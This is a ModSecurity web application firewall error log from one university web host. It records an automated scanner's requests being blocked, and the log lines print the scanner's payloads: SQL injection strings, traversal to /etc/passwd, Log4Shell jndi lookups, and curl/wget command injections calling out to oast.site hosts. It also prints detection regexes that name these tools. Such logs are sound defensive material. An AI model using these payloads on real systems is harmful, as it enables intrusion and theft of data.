[Tue Aug 29 11:31:01.670648 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:post_ids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:post_ids: 0) union select md5(999999999),null,null -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO10hcCo-f0AAAP05JQAAAAA"]
[Tue Aug 29 11:31:03.693349 2023] [:error] [pid 1019] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:Event. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:Event: `curl http:/cjmn8l5jmimk2adbbnlgggta6qh8stafb.oast.site -H 'User-Agent: n5Umc3'`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/include/makecvs.php"] [unique_id "ZO10h8Co-f0AAAP7dWYAAAAR"]
[Tue Aug 29 11:31:04.671960 2023] [:error] [pid 1016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgjef7q4ff3gfub.oast.site#.salesforce.com/ found within TX:1: cjmn8l5jmimk2adbbnlgjef7q4ff3gfub.oast.site#.salesforce.com/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/service/error/sfdc_preauth.jsp"] [unique_id "ZO10iMCo-f0AAAP4H90AAAAI"]
[Tue Aug 29 11:31:04.749135 2023] [:error] [pid 1025] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:path: `curl http:/cjmn8l5jmimk2adbbnlghsn5oue3qq7ed.oast.site -H 'User-Agent: n5Umc3'`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/tos/index.php"] [unique_id "ZO10iMCo-f0AAAQBUFcAAAAj"]
[Tue Aug 29 11:31:05.021186 2023] [:error] [pid 1023] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:user_login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:user_login: ' AND (SELECT 8149 FROM (SELECT(SLEEP(3)))NuqO) AND 'YvuB'='YvuB"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-json/pie/v1/login"] [unique_id "ZO10icCo-f0AAAP-LMoAAAAe"]
[Tue Aug 29 11:31:05.728854 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:user: a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null..."] [severity " [hostname "mbkm.unla.ac.id"] [uri "/api.php"] [unique_id "ZO10icCo-f0AAAQKOZcAAAAs"]
[Tue Aug 29 11:31:06.331739 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:command: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/sysShell"] [unique_id "ZO10isCo-f0AAAQJWpsAAAAr"]
[Tue Aug 29 11:31:06.365218 2023] [:error] [pid 1024] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ./../../../../../../../../ found within ARGS:controller: ./../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10isCo-f0AAAQA-6sAAAAi"]
[Tue Aug 29 11:31:07.320402 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:handle: com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://cjmn8l5jmimk2adbbnlg4ntyrhyigki5p.oast.site')"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/console/images/%2e%2e%2fconsole.portal"] [unique_id "ZO10i8Co-f0AAAQOvzMAAAAw"]
[Tue Aug 29 11:31:08.311676 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../..////////// found within ARGS:lang: /../../../..//////////dev/cmdb/sslvpn_websession"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/remote/fgt_lang"] [unique_id "ZO10jMCo-f0AAAOKNuYAAAAK"]
[Tue Aug 29 11:31:09.099136 2023] [:error] [pid 1024] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:timezone. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:timezone: 1;wget http:/cjmn8l5jmimk2adbbnlgt6y4opoczhjxq.oast.site;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/upload"] [unique_id "ZO10jcCo-f0AAAQA-68AAAAi"]
[Tue Aug 29 11:31:10.329147 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:param: action=sql sql='select md5(999999999)'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10jsCo-f0AAAQJWqMAAAAr"]
[Tue Aug 29 11:31:10.386966 2023] [:error] [pid 1024] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:dir: 'Pa_Noteexpr curl+cjmn8l5jmimk2adbbnlgabjzz636rmbzf.oast.sitePa_Note'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/cgi-bin/file_transfer.cgi"] [unique_id "ZO10jsCo-f0AAAQA-7QAAAAi"]
[Tue Aug 29 11:31:10.387370 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:command: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/pages/systemcall.php"] [unique_id "ZO10jsCo-f0AAAPPS04AAAAd"]
[Tue Aug 29 11:31:11.321115 2023] [:error] [pid 1026] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:nodeId[nodeid]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ',@@ found within ARGS:nodeId[nodeid]: 1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT('vbulletin','rce',@@version),19,20,21,22,23,24,25,26,27-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/ajax/api/content_infraction/getIndexableContent"] [unique_id "ZO10j8Co-f0AAAQCvz0AAAAk"]
[Tue Aug 29 11:31:11.989130 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ';`wget http:/cjmn8l5jmimk2adbbnlg9d75t7x8wdt5x.oast.site;`;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO10j8Co-f0AAAOKNu0AAAAK"]
[Tue Aug 29 11:31:13.308914 2023] [:error] [pid 1032] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-831}${:-468}.${hostName}.username.cjmn8l5jmimk2adbbnlgpxapbg6ga339i.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/ccmadmin/j_security_check"] [unique_id "ZO10kcCo-f0AAAQIS7QAAAAq"]
[Tue Aug 29 11:31:13.313672 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:{"params":"w. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x5c\\x22| found within ARGS:{\\x22params\\x22:\\x22w: 123\\x5c\\x22'1234123'\\x5c\\x22|cat /etc/passwd\\x22}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/api/edr/sangforinter/v2/cssp/slog_client"] [unique_id "ZO10kcCo-f0AAAPOhekAAAAa"]
[Tue Aug 29 11:31:13.425273 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://0.0.0.0 found within ARGS:url: http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/premise/front/getPingData"] [unique_id "ZO10kcCo-f0AAAQEGGYAAAAm"]
[Tue Aug 29 11:31:14.331328 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()))))-- - found within ARGS:id: 1' and extractvalue(0x0a,concat(0x0a,(select concat_ws(0x207c20,md5(999999999),1,user()))))-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO10ksCo-f0AAAPMmHAAAAAY"]
[Tue Aug 29 11:31:14.335856 2023] [:error] [pid 1026] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../ found within ARGS:path: /../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php/admin/filemanager/sa/getZipFile"] [unique_id "ZO10ksCo-f0AAAQCv0QAAAAk"]
[Tue Aug 29 11:31:15.420054 2023] [:error] [pid 1032] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:question_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:question_id: 1 AND (SELECT 7242 FROM (SELECT(SLEEP(4)))HQYx)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10k8Co-f0AAAQIS7sAAAAq"]
[Tue Aug 29 11:31:16.669725 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:del. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: (*), found within ARGS:del: 123456 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- '"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/admin/cms_channel.php"] [unique_id "ZO10lMCo-f0AAAOKNvQAAAAK"]
[Tue Aug 29 11:31:17.318942 2023] [:error] [pid 1024] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:apikey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:apikey: 'UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO10lcCo-f0AAAQA-8YAAAAi"]
[Tue Aug 29 11:31:17.340820 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:path: /var/www/documentation/../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/webui/file_guest"] [unique_id "ZO10lcCo-f0AAAP5mHgAAAAM"]
[Tue Aug 29 11:31:17.348898 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:lib_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:lib_path: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10lcCo-f0AAAQQyjsAAAAy"]
[Tue Aug 29 11:31:18.329494 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:payload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >../ found within ARGS:payload: `ls>../2UdxkOOWwm6uOELSJnJyclAZM5S`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/cgi-bin/downloadFlile.cgi"] [unique_id "ZO10lsCo-f0AAAQQyj0AAAAy"]
[Tue Aug 29 11:31:18.391275 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:OFBiz.Visitor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within REQUEST_COOKIES:OFBiz.Visitor: ${jndi:ldap://${:-381}${:-522}.${hostName}.cookie.cjmn8l5jmimk2adbbnlg4tdm3wj5x9t5t.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/webtools/control/main"] [unique_id "ZO10lsCo-f0AAAOM4eAAAAAU"]
[Tue Aug 29 11:31:20.344651 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:template_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:template_path: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-json/lp/v1/courses/archive-course"] [unique_id "ZO10mMCo-f0AAAPRNgkAAAAf"]
[Tue Aug 29 11:31:22.480913 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: /* found within ARGS_NAMES:id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli: id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC [hostname "mbkm.unla.ac.id"] [uri "/search/members/"] [unique_id "ZO10msCo-f0AAAN@5EMAAAAO"]
[Tue Aug 29 11:31:23.332006 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:code: a' OR (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO10m8Co-f0AAAQQykcAAAAy"]
